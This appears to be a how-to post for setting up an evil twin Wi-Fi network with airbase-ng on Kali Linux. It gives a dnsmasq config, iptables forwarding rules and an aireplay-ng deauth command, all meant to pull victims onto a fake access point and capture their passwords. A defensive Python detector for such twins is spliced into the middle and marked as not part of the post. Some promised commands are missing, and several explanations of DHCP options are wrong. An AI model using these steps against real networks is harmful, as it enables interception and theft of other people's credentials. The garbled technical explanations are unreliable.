Create Evil Twin Wireless Network with Kali Linux & Airbase-ng

Airbase-ng lets us create an evil twin wireless network: the targets connect to it and are still able to use the internet, because we provide connectivity so they can continue working without any disruption. While they are connected to our evil twin network, their traffic is monitored and logged in order to capture sensitive information such as login passwords.

To create the evil twin wireless network, we're going to use airbase-ng. We also need a WIFI card that supports monitor mode and packet injection.

First, we need to install “dnsmasq”, as it will be used to forward the DNS traffic. Install it with “apt install dnsmasq”.

Then, create a new file with the dnsmasq configuration:

interface=at0
dhcp-range=192.168.1.15,192.168.1.100,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
server=8.8.4.4
log-queries
log-dhcp
listen-address=127.0.0.1

Save it on your desktop as “dnsmasq.conf”.

Now, let's explain what these settings do, line by line:

“interface=at0” is the interface that will be created by Airbase-ng.

“dhcp-range=192.168.1.15,192.168.1.100,12h” sets the DHCP range of IPs. The range is up to you; in my case I chose .15 to .100, and “12h” is the lease time.

“dhcp-option=3,192.168.1.1” option 3, in case we have multiple gateways in our configuration file.

“dhcp-option=6,192.168.1.1” option 6 will distribute the clients' IPs on the gateways identified by option 3.

“server=8.8.8.8” adds a different DNS server, such as Google's.

The last step is to log any queries and DHCP traffic.

Now, we will put our WIFI card into monitor mode by running:

To start scanning for WIFI around us we will use:

airodump-ng wlan0

Leave it running to scan for all the WIFI networks in the area and find the target we need. By now we have chosen one of these networks to duplicate, so while the scan is running, we start Airbase-ng to create the Evil-Twin network:

By starting Airbase-ng we created the interface “at0”.

The next part is to enter some commands to configure internet access for the victim. We need him to keep using the internet through our WIFI interface “at0”, and at the same time we will log all his traffic, including the websites he visits and the usernames and passwords he enters.

“ifconfig at0 up” to make sure the interface is up and running.

“ifconfig at0 192.168.1.1 netmask 255.255.255.0” configure the interface to use our netmask.

“route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1” configure the internet route to use our gateway.

“iptables --flush” clear the iptables rules.

“iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE” the POSTROUTING chain controls the flow of traffic going out of the interface “eth0”, and MASQUERADE handles the outgoing traffic without disturbing the original traffic on our machine.

“iptables --append FORWARD --in-interface at0 -j ACCEPT” start port forwarding on the interface “at0”.

“iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.1:80” the PREROUTING chain controls the inbound traffic through the gateway 192.168.1.1 and port 80.

“iptables -t nat -A POSTROUTING -j MASQUERADE” just adds MASQUERADE to the inbound interface to make sure there is no disturbance to the original traffic on our machine.

“echo 1 > /proc/sys/net/ipv4/ip_forward” to activate the port forwarding on our machine.

Now we need to deauth any device connected to the target WIFI using Aireplay-ng, to disconnect it from the target and have it connect to our Evil-Twin WIFI:

aireplay-ng --deauth 0 -a [BSSID of the target WIFI] wlan0

At this point all we have to do is wait for the target to disconnect from his network and connect to ours:

Take a look at this: the first WIFI is the Evil-Twin network we have created, and it's open for anyone to connect to. The third WIFI is the victim's WIFI, which of course is locked (password protected) and has the same name.
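The pattern described above, an open network advertising the same name as a protected one, is also what a defender can alert on. The following is an added example, not part of the original post: it checks wireless scan results for an SSID reused by an access point that is missing from an inventory or that advertises weaker security. The scan records, the KNOWN inventory and every name and address in them are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample scan results (not captured data): one record per beacon seen.
SCAN = [
    {"ssid": "CorpNet", "bssid": "aa:bb:cc:00:00:01", "security": "WPA2"},
    {"ssid": "CorpNet", "bssid": "aa:bb:cc:00:00:02", "security": "WPA2"},
    {"ssid": "CorpNet", "bssid": "02:11:22:33:44:55", "security": "OPEN"},
    {"ssid": "CafeGuest", "bssid": "aa:bb:cc:00:10:01", "security": "OPEN"},
    {"ssid": "HomeLab", "bssid": "aa:bb:cc:00:20:01", "security": "WPA2"},
]

# Assumed inventory of access points you operate:
# SSID -> (allowed BSSIDs, expected security mode)
KNOWN = {
    "CorpNet": ({"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"}, "WPA2"),
}

def find_suspect_aps(scan, known):
    """Flag beacons that reuse an SSID with an unknown BSSID or weaker security."""
    by_ssid = defaultdict(list)
    for ap in scan:
        by_ssid[ap["ssid"]].append(ap)
    findings = []
    for ssid, aps in by_ssid.items():
        modes = {ap["security"] for ap in aps}
        allowed, expected = known.get(ssid, (None, None))
        for ap in aps:
            reasons = []
            if allowed is not None and ap["bssid"].lower() not in allowed:
                reasons.append("bssid-not-in-inventory")
            if expected is not None and ap["security"] != expected:
                reasons.append("security-downgrade")
            # No inventory for this SSID: an open AP sharing its name with a
            # protected AP is still the pattern described in the text.
            if allowed is None and ap["security"] == "OPEN" and len(modes) > 1:
                reasons.append("open-twin-of-protected-ssid")
            if reasons:
                findings.append((ssid, ap["bssid"], reasons))
    return findings

if __name__ == "__main__":
    for ssid, bssid, reasons in find_suspect_aps(SCAN, KNOWN):
        print(f"ALERT ssid={ssid!r} bssid={bssid} reasons={','.join(reasons)}")
```

An open network with no same-named protected counterpart, such as the constructed “CafeGuest” entry, is not flagged, so ordinary guest networks do not raise alerts.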

Now that the target has connected to our WIFI, let's take a look at the dnsmasq part:

There is a lot of traffic going on here, but if we want to see more detail, we can run Wireshark:

You can use filters like tcp or https to look for specific information, such as site logins, to capture passwords or any sensitive information that you want.

Also, you can run MITM attack using “Ettercap”.
